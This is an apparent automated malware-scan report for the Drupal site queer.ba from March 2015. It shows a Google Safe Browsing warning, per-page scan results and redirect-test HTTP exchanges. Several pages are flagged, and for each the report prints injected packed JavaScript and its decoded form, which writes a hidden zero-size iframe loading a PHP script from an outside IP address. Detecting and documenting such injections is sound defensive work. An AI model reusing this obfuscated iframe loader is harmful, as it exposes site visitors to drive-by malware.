Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=queer.ba
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://queer.ba/ | 200 OK Content-Length: 23365 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|217||src|height|173|width|board||144|php|44|tag1|ram'.split('|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://217.173.44.144/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://217.173.44.144/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://217.173.44.144/tag1.php"></ifee> | ||
http://queer.ba/misc/jquery.js?v=1.4.4 | 200 OK Content-Length: 78602 Content-Type: application/javascript | clean |
http://queer.ba/misc/jquery.once.js?v=1.2 | 200 OK Content-Length: 2974 Content-Type: application/javascript | clean |
http://queer.ba/misc/drupal.js?mjvxbe | 200 OK Content-Length: 14544 Content-Type: application/javascript | clean |
http://queer.ba/sites/all/modules/lightbox2/js/lightbox.js?1425405616 | 200 OK Content-Length: 45178 Content-Type: application/javascript | clean |
http://queer.ba/sites/all/modules/panels/js/panels.js?mjvxbe | 200 OK Content-Length: 746 Content-Type: application/javascript | clean |
http://queer.ba/sites/all/modules/google_analytics/googleanalytics.js?mjvxbe | 200 OK Content-Length: 3422 Content-Type: application/javascript | clean |
http://queer.ba/en/home | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://queer.ba/test404page.js | 404 Not Found Content-Length: 14120 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|217||src|height|173|width|board||144|php|44|tag1|ram'.split('|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://217.173.44.144/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://217.173.44.144/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://217.173.44.144/tag1.php"></ifee> | ||
http://queer.ba/sites/all/modules/lightbox2/js/lightbox.js?1425405624 | 200 OK Content-Length: 45178 Content-Type: application/javascript | clean |
http://queer.ba/seeq | 200 OK Content-Length: 19154 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|217||src|height|173|width|board||144|php|44|tag1|ram'.split('|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://217.173.44.144/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://217.173.44.144/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://217.173.44.144/tag1.php"></ifee> | ||
http://queer.ba/sites/all/modules/lightbox2/js/lightbox.js?1425405625 | 200 OK Content-Length: 45178 Content-Type: application/javascript | clean |
http://queer.ba/pocetna | 200 OK Content-Length: 23372 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|217||src|height|173|width|board||144|php|44|tag1|ram'.split('|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://217.173.44.144/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://217.173.44.144/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://217.173.44.144/tag1.php"></ifee> | ||
http://queer.ba/sites/all/modules/lightbox2/js/lightbox.js?1425405626 | 200 OK Content-Length: 45178 Content-Type: application/javascript | clean |
http://queer.ba/aktivnosti | 200 OK Content-Length: 24299 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|217||src|height|173|width|board||144|php|44|tag1|ram'.split('|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://217.173.44.144/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://217.173.44.144/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://217.173.44.144/tag1.php"></ifee> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: queer.ba
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 03 Mar 2015 18:00:16 GMT
ETag: "1425405616"
Server: Apache
Vary: Accept-Encoding
Content-Language: bs
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 03 Mar 2015 18:00:16 GMT
X-Generator: Drupal 7 (http://drupal.org)
X-UA-Compatible: IE=edge,chrome=1
GET / HTTP/1.1
Host: queer.ba
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 03 Mar 2015 18:00:16 GMT
ETag: "1425405616"
Server: Apache
Vary: Accept-Encoding
Content-Language: bs
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 03 Mar 2015 18:00:16 GMT
X-Generator: Drupal 7 (http://drupal.org)
X-UA-Compatible: IE=edge,chrome=1
Second query (visit from search engine):
GET / HTTP/1.1
Host: queer.ba
Referer: http://www.google.com/search?q=queer.ba
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: queer.ba
Referer: http://www.google.com/search?q=queer.ba
Result:
The result is similar to the first query. There are no suspicious redirects found.